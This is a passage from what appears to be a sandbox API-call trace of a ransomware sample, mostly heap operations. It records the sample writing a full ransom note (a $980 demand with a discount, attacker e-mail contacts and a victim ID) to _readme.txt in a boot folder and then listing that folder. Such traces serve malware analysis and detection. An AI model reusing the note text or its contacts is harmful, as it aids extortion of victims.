0x99e3968 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.814] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.815] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.815] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.816] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.816] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0090.816] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.816] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.816] PathFindFileNameW (pszPath="") returned="" [0090.816] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.817] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.817] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.817] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.817] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0090.817] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.817] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0090.817] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.817] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.817] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.817] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.817] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.818] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.818] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.818] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.818] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.818] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.818] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.819] CloseHandle (hObject=0x5cc) returned 1 [0090.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.819] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.819] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.820] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.820] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.820] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.820] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.820] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.820] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.820] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.821] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.822] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 